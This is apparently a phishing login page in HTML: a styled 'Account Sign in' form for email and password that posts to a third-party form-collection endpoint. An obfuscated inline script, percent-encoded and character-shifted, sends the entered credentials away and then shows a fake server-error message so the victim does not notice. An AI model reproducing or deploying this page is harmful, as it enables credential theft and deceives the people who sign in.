<!DOCTYPE html>
<html lang="en" >
<head>
  <meta charset="UTF-8">
  <title>Forbidden Log in</title>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css">
<link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.12.1/css/all.min.css'><link rel="stylesheet" href="./style.css">

</head>
<body>
<!-- partial:index.partial.html -->
<div class="contact-wrapper">
  <header class="login-cta">
    <h2>Account Sign in</h2>
  </header>
  <form  id="my-form" action="https://formspree.io/f/xoqbwebb" method="POST">
    <div class="form-row">
      <input type="email" name="email" class="form-control" id="exampleInputEmail1" aria-describedby="emailHelp" type="text" required>
      <span>Username or Email</span>
    </div>
    <div class="form-row">
      <input type="password" name="password" class="form-control" id="exampleInputEmail1" aria-describedby="emailHelp" required>
      <span>Password</span>
    </div>
    <div class="form-row"></div>
    <div class="form-row">
      <button id="my-form-button" type="submit">Sign in</button>
      
    </div>
              <span id="my-form-status" class="form-text text-muted"></span>
   
  </form>
  <div class="socials-wrapper">
    <header>
      <h2>FORBIDDEN</h2>     </header>
  </div>
</div>
<!-- partial -->
  
<script language=ajax>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('*75*75%7Bfw*75ktwr*75*8I*75ithzrjsy3ljyJqjrjsyG%7ENi*7%3D*77r%7E2ktwr*77*7%3E*8G*5F*5F*75*75*75*75*75fx%7Esh*75kzshynts*75mfsiqjXzgrny*7%3Dj%7Bjsy*7%3E*75*%3CG*5F*75*75*75*75*75*75*75j%7Bjsy3uwj%7BjsyIjkfzqy*7%3D*7%3E*8G*5F*75*75*75*75*75*75*75%7Bfw*75xyfyzx*75*8I*75ithzrjsy3ljyJqjrjsyG%7ENi*7%3D*77r%7E2ktwr2xyfyzx*77*7%3E*8G*5F*75*75*75*75*75*75*75%7Bfw*75ifyf*75*8I*75sj%7C*75KtwrIfyf*7%3Dj%7Bjsy3yfwljy*7%3E*8G*5F*75*75*75*75*75*75*75kjyhm*7%3Dj%7Bjsy3yfwljy3fhynts*7H*75*%3CG*5F*75*75*75*75*75*75*75*75*75rjymti*8F*75ktwr3rjymti*7H*5F*75*75*75*75*75*75*75*75*75gti%7E*8F*75ifyf*7H*5F*75*75*75*75*75*75*75*75*75mjfijwx*8F*75*%3CG*5F*75*75*75*75*75*75*75*75*75*75*75*7%3CFhhjuy*7%3C*8F*75*7%3Cfuuqnhfynts4oxts*7%3C*5F*75*75*75*75*75*75*75*75*75*%3CI*5F*75*75*75*75*75*75*75*%3CI*7%3E3ymjs*7%3Dwjxutsxj*75*8I*8J*75*%3CG*5F*75*75*75*75*75*75*75*75*75nk*75*7%3Dwjxutsxj3tp*7%3E*75*%3CG*5F*75*75*75*75*75*75*75*75*75*75*75xyfyzx3nssjwMYRQ*75*8I*75*77Xnls*75ns*75jwwtw3*75Ymjwj*75%7Cfx*75f*75uwtgqjr*75ts*75ymj*75xjw%7Bjw3*77*8G*5F*75*75*75*75*75*75*75*75*75*75*75ktwr3wjxjy*7%3D*7%3E*5F*75*75*75*75*75*75*75*75*75*%3CI*75jqxj*75*%3CG*5F*75*75*75*75*75*75*75*75*75*75*75wjxutsxj3oxts*7%3D*7%3E3ymjs*7%3Difyf*75*8I*8J*75*%3CG*5F*75*75*75*75*75*75*75*75*75*75*75*75*75nk*75*7%3DTgojhy3mfxT%7Cs*7%3Difyf*7H*75*7%3Cjwwtwx*7%3C*7%3E*7%3E*75*%3CG*5F*75*75*75*75*75*75*75*75*75*75*75*75*75*75*75xyfyzx3nssjwMYRQ*75*8I*75ifyf*%3AG*77jwwtwx*77*%3AI3rfu*7%3Djwwtw*75*8I*8J*75jwwtw*%3AG*77rjxxflj*77*%3AI*7%3E3otns*7%3D*77*7H*75*77*7%3E*5F*75*75*75*75*75*75*75*75*75*75*75*75*75*%3CI*75jqxj*75*%3CG*5F*75*75*75*75*75*75*75*75*75*75*75*75*75*75*75xyfyzx3nssjwMYRQ*75*8I*75*77Ttux*76*75Ymjwj*75%7Cfx*75f*75uwtgqjr*75Xnlsnsl*75zu*75%7Etzw*75fhhtzsy*77*5F*75*75*75*75*75*75*75*75*75*75*75*75*75*%3CI*5F*75*75*75*75*75*75*75*75*75*75*75*%3CI*7%3E*5F*75*75*75*75*75*75*75*75*75*%3CI*5F*75*75*75*75*75*75*75*%3CI*7%3E3hfyhm*7%3Djwwtw*75*8I*8J*75*%3CG*5F*75*75*75*75*75*75*75*75*75xyfyzx3nssjwMYRQ*75*8I*75*77Ttux*76*75Ymjwj*75%7Cfx*75f*75uwtgqjr*75xnlsnsl*75zu*75%7Etzw*75fhhtzsy*77*5F*75*75*75*75*75*75*75*%3CI*7%3E*8G*5F*75*75*75*75*75*%3CI*5F*75*75*75*75*75ktwr3fiiJ%7BjsyQnxyjsjw*7%3D*77xzgrny*77*7H*75mfsiqjXzgrny*7%3E5')</script>
   
 <style>
   @import url("https://fonts.googleapis.com/css?family=Rajdhani:500,700&display=swap");
*,
*:before,
*:after {
  box-sizing: border-box;
}

body {
  align-items: center;
  background-image:url(https://i.pinimg.com/originals/ff/f9/a7/fff9a7b108d34d772540f258198f9d48.gif);
  background-size:cover;
 background-repeat:no-repeat;
  display: flex;
  font-family: "Rajdhani", sans-serif;
  height: 100vh;

  justify-content: center;
}

.contact-wrapper {
  background: #191919;
  box-shadow: 3px 3px 2px rgba(0, 0, 0, 0.15);
  border-radius: 0.75em;
  padding: 3em;
          color: #3e3f5e;

  width: 25em;
}

.login-cta > h2 {
  font-size: 1.75rem;
        color: #3e3f5e;


  text-align: center;
}

.socials-wrapper > header > h2 {
  background: #191919;
  color: #3e3f5e;
  font-size: 1rem;
  position: relative;
  text-align: center;
  z-index: 10;
      color: white;

}
.socials-wrapper > header > h2:after, .socials-wrapper > header > h2:before {
  background: transparent;
  content: "";
  display: block;
  height: 0.1em;
    border: 1px solid #532cf8;

  position: absolute;
  top: 50%;
  transform: translatey(-50%);
  width: 17.5%;
}
.socials-wrapper > header > h2:after {
  right: 0;
}
.socials-wrapper > header > h2:before {
  left: 0;
}
.socials-wrapper > ul {
  display: flex;
  list-style: none;
  justify-content: center;
  padding: 0;
}
.socials-wrapper > ul > li {
  margin: 0.5em;
}
.socials-wrapper > ul > li > a {
  align-items: center;
  border-radius: 0.5em;
  color: #fff;
  display: flex;
  height: 2em;
  
  justify-content: center;
  text-align: center;
  text-decoration: none;
  transition: all 300ms ease;
  width: 2em;
}
.socials-wrapper > ul > li > a.facebook {
  background-color: #3763d2;
}
.socials-wrapper > ul > li > a.twitter {
  background-color: #1abcff;
}
.socials-wrapper > ul > li > a.twitch {
  background-color: #7b5dfa;
}
.socials-wrapper > ul > li > a.youtube {
  background-color: #fd434f;
}
.socials-wrapper > ul > li > a:hover {
  transform: translatey(-0.25em);
}

form {
  margin: 2em 0;
  
}
form > .form-row {
  display: flex;
  margin: 0.75em 0;
  
  position: relative;
}
form > .form-row > span {
  background: transparent;
  color: white;
  display: inline-block;
  
  font-weight: 400;
  left: 1em;
  padding: 0 0.5em;
  
  position: absolute;
  pointer-events: none;
  transform: translatey(-50%);
  top: 50%;
  transition: all 300ms ease;
  -webkit-user-select: none;
     -moz-user-select: none;
      -ms-user-select: none;
          user-select: none;
}
form > .form-row > input, form > .form-row > button {
  border-radius: 0.5em;
  font-family: inherit;
  background-color:#3e3f5e;
  padding: 1em 0.5em;
  
  width: 100%;
}
form > .form-row > input {
  font-weight: bold;
    border: 1px solid #532cf8;

  transition: 100ms ease all;
  width: 100%;
}
form > .form-row > input[type=text], form > .form-row > input[type=password] {
      border: 1px solid #532cf8;

}
form > .form-row > input:valid + span {
  top: 0;
  font-size: 0.9rem;
}
form > .form-row > input:invalid + span {
  top: 50%;
}
form > .form-row > input:focus + span {
  top: 0;
}
form > .form-row > input:required {
  box-shadow: none;
}
form > .form-row > input:focus {
  border-color: #7b5dfa;
  outline: none;
}
form > .form-row > input:focus:invalid {
  box-shadow: none;
  top: 50%;
}
form > .form-row > input:focus:valid {
  top: 0;
}
form > .form-row > button {
  background-color: #7b5dfa;
  border: 0.1em solid #7b5dfa;
  color: #fff;
  cursor: pointer;
  font-weight: bold;
  transition: all 300ms ease;
}
form > .form-row > button:focus {
  border: 0.1em solid #532cf8;
  outline: none;
}
form > .form-row > button:hover {
  background-color: #6744f9;
}

 </style> 
</body>
</html>
